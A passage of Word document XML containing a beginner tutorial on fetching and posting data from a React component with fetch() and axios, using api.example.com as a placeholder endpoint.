      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example using fetch():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A73C0"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import React, { useState, useEffect } from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177720D" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5F4CBE"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const App = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690FDDB4"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const [data, setData] = useState(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B92393"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const [loading, setLoading] = useState(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996886E"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const [error, setError] = useState(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCCF7C" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B094B2"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084569E7"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 Making a GET request to the external API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC7258"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fetch('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB995A"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then((response) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF6BD13"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if (!response.ok) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C088A0"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throw new Error('Network response was not ok');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C462C61"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B215F4D"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return response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51F38E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F93541"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      .then((data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677CA799"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setData(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34368022"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setLoading(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE733E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7D1A9"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catch((error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F332CD1"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setError(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B2166"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setLoading(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D06DF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D5110"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 []); // Empty dependency array ensures this runs once when the component mounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB8132" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC81F59"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if (loading) return &lt;div&gt;Loading...&lt;/div&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A678C10"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if (error) return &lt;div&gt;Error: {error.message}&lt;/div&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21753DD2" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D16C5E"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return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62372C23"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lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A51A52"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lt;h1&gt;Data from API&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEFB34D"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lt;pre&gt;{JSON.stringify(data, null, 2)}&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE6005"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lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457691DB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C66A14"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E07436" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD6E14E"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export default App;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8E5530" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866E2FC"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useEffect</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to fetch data when the component mounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1EC181"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fetch()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Makes a GET request to the provided API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF2312D"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response.json()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Parses the response as JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225577D9"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setData()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Updates the state with the fetched data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E373E8"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Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uses .catch() to handle errors if the request fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E26E57" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="00000000" w:rsidP="00EC456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B40C158">
          <v:rect id="_x0000_i3578" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AFB808" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Using axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3433B5C4"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Axios is a popular library for making HTTP requests. It simplifies handling requests and responses and automatically transforms JSON data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED0F625" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>First, install axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FD064"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npm install axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A7C32" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example using axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B6B59"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import React, { useState, useEffect } from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C1FF5C"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import axios from 'axios';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E57F1" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4830AB91"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const App = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E32ACA0"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const [data, setData] = useState(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49152C86"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const [loading, setLoading] = useState(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C59E593"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const [error, setError] = useState(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC90A86" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA59384"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41190AD1"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 Making a GET request to the external API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0C1EC"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axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC7E50"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get('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6750A"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then((response) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1224E065"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setData(response.data); // Access the response data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC13B6A"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setLoading(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11183E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDBC7FC"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catch((error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3393D0A2"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setError(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B7B8A2"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setLoading(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32FA44"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7CD41"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 []); // Empty dependency array ensures this runs once when the component mounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A2C8E" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9BF377"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if (loading) return &lt;div&gt;Loading...&lt;/div&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7F8B2"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if (error) return &lt;div&gt;Error: {error.message}&lt;/div&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C7DB0" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1E852E"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return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8110D"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lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2E34F"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lt;h1&gt;Data from API&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E372165"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lt;pre&gt;{JSON.stringify(data, null, 2)}&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1408F56A"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lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB8F31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547120AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF201B" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607F796F"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export default App;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562780F" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA49E07"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axios.get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Makes a GET request to the provided API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F76CB"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response.data</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Accesses the actual data from the response object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D1427"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setData()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Updates the state with the fetched data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4ADDCE"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Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handles any errors in the .catch() block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C062B" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="00000000" w:rsidP="00EC456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E4623E2">
          <v:rect id="_x0000_i3579" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF593C3" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Making POST Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32684C"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If you need to send data to an API (e.g., for form submissions), you can make a POST request using both fetch() and axios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7F7E2" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example with fetch() (POST request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D95DB"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fetch('https://api.example.com/data', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327ADCF5"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method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B7A26"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headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209C0CC"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Content-Type': 'application/json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B362667"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C2485"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body: JSON.stringify({ name: 'John', age: 30 }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1D9C3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CBC058"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then((response) =&gt; response.json())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389EB3C8"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then((data) =&gt; console.log(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63C1E5"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catch((error) =&gt; console.error('Error:', error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12378B" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example with axios (POST request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE9C908"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axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D2035C"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post('https://api.example.com/data', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7B6E3"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name: 'John',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069013D6"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age: 30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6055A579"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9FDA7"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then((response) =&gt; console.log(response.data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A44E2B0"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catch((error) =&gt; console.error('Error:', error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB92673" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="00000000" w:rsidP="00EC456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3DB89EB">
          <v:rect id="_x0000_i3580" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04B935" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941FF45"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fetch()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native JavaScript function for making HTTP requests. It requires manual handling of response parsing and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EACBD1" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5"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axios</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A popular library that provides a simpler API for HTTP requests and automatically handles response parsing and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE5B32" w14:textId="057FAF1A" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3EC77927">
          <v:rect id="_x0000_i3581" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B42353" w14:textId="6492E402" w:rsidR="00EA1B73" w:rsidRPr="00CE4B95" w:rsidRDefault="0027795D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
